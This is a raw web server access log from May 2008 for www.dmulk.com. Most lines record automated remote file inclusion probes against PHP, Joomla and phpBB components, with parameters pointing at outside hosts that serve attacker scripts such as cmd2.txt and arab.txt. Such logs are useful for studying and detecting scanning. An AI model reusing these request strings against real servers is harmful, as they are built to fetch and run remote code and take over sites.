78.90.30.31 - - [04/May/2008:09:29:18 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:29:18 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:29:30 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:09:29:41 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:29:49 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:29:50 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:29:59 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:09:30:00 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:09:30:00 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:09:30:02 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:09:30:03 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:05 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:05 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:05 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:05 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:06 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:06 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
78.90.30.31 - - [04/May/2008:09:30:11 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:20 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:20 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:21 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:09:30:24 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:09:30:24 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:30:28 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:35 -0700] "GET /logs/access_080131.log/convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:36 -0700] "GET /convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:30:36 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:30:58 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0)" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:30:58 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:09:31:10 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:31:15 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:31:17 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:31:22 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:31:23 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:31:23 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:31:24 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (http://www.googlebot.com/bot.html)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:31:29 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.23.96 - - [04/May/2008:09:31:48 -0700] "GET /mobilehackers/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:31:53 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:32:25 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:32:26 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:32:44 -0700] "GET /logs/access_080228.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.49.157 - - [04/May/2008:09:32:47 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
190.54.49.157 - - [04/May/2008:09:32:47 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://rehab.ru/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:32:48 -0700] "GET /logs/access_071219.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:32:49 -0700] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:09:32:51 -0700] "GET /logs/access_080228.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:32:52 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:32:57 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:09:32:57 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:33:06 -0700] "GET /index.php?menu=deti&page=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:33:07 -0700] "GET /logs/access_071212.log//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:33:23 -0700] "GET /logs/main.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:09:33:23 -0700] "GET /main.php?x=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:33:24 -0700] "GET /logs/access_080110.log//wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:33:24 -0700] "GET //wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:33:24 -0700] "GET /logs//wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:33:25 -0700] "GET /logs/access_080110.log//wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:33:25 -0700] "GET //wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:33:26 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:33:26 -0700] "GET /logs//wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:33:42 -0700] "GET /logs/access_080219.log/extras/ext_cats.php?dir_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:33:42 -0700] "GET /logs/extras/ext_cats.php?dir_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:33:54 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:33:57 -0700] "GET /extras/ext_cats.php?dir_path=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:34:08 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:34:27 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "www.dmulk.com"
66.7.193.54 - - [04/May/2008:09:34:44 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.193.54 - - [04/May/2008:09:34:44 -0700] "GET /logs//include.php?path[docroot]=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:34:55 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:34:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:35:01 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:35:02 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.70.204.99 - - [04/May/2008:09:35:04 -0700] "GET //metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:35:06 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; (R1 1.3); .NET CLR 1.1.4322)" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:35:10 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:35:11 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.7.193.54 - - [04/May/2008:09:35:15 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:35:28 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:35:29 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:35:36 -0700] "GET /logs/access_080128.log//wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:35:39 -0700] "GET /logs/access_080128.log//wordtube-button.php?wpPATH=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:35:41 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.75 [en]" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:36:09 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator)" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:36:13 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:36:22 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:36:22 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:36:23 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:36:27 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:36:27 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:36:43 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:09:36:44 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:09:36:44 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:09:36:45 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:36:47 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:36:47 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:36:48 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:37:07 -0700] "GET /admin/index.php?o=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:37:13 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:37:13 -0700] "GET /logs/access_080228.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:09:37:16 -0700] "GET /admin/index.php?o=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:37:25 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:37:26 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:37:30 -0700] "GET //?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:09:37:31 -0700] "GET /logs//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 45988 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:37:38 -0700] "GET /logs/access_080315.log//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:37:39 -0700] "GET /logs//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
200.82.111.68 - - [04/May/2008:09:37:43 -0700] "GET /logs/access_080201.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:37:44 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:09:37:44 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.151.23.213 - - [04/May/2008:09:37:44 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:09:37:49 -0700] "GET /logs/access_080315.log//metabase/metabase_interface.php?commonpath=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
